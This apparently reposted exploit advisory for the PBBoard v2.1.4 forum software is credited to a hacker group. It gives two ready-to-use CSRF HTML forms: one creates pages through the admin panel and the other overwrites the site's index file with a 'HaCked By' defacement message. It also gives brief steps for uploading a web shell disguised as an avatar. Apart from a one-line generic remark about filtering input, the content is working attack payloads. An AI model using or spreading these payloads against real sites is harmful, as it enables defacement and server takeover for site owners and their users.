标题: PBBoard v2.1.4 <= Multiple Vulnerabilites 作者 : KedAns-Dz HdhCmsTest2cto测试数据 ked-h@hotmail测试数据 | ked-h@exploit-id测试数据 | kedans@facebook测试数据 Facebook : http://facebook测试数据/KedAns 程序脚本 : php 缺陷分类 : Multiple XSRF/FU 测试平台 : Windows XP-SP3 Fr ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. | # | ------------------------------------------------- < | ## # [1] XSRF/CSRF Add NeW File => <form action="http://[HdhCmsTest2cto测试数据]/admin.php?page=pages&add=1&start=1" name="myform" method="post"> <input type="text" name="name" id="input_name" value="dz. html " size="30" /> <textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/"> HaCked By KedAns-Dz </textarea> <input class="submit" type="submit" value="Submit/Save" name="submit" accesskey="s" /> </form> # [2] XSRF/CSRF Change Index File => <form action="http://[HdhCmsTest2cto测试数据]/admin.php?page=pages&dit=1&start=1&id=1" name="myform" method="post"> <input type="text" name="name" id="input_name" value="index.html" size="30" /> <textarea name="text" id="textarea_text" rows="17" cols="81" wrap="virtual" dir="/"> HaCked By KedAns-Dz </textarea> <input class="submit" type="submit" value="Submit/Accept" name="submit" accesskey="s" /> </form> # [3] Shell/File Upload : 注册后去 : /index.php?page=usercp&control=1&avatar=1&main=1 # 上传 SHell {Ev!L}.txt + fin him /download/avatar/{Ev!L}.txt 修复: 针对上述代码分析进行过滤和验证
查看更多关于PBBoard v2.1.4 <=多重缺陷及修复 - 网站安全 - 自学的详细内容...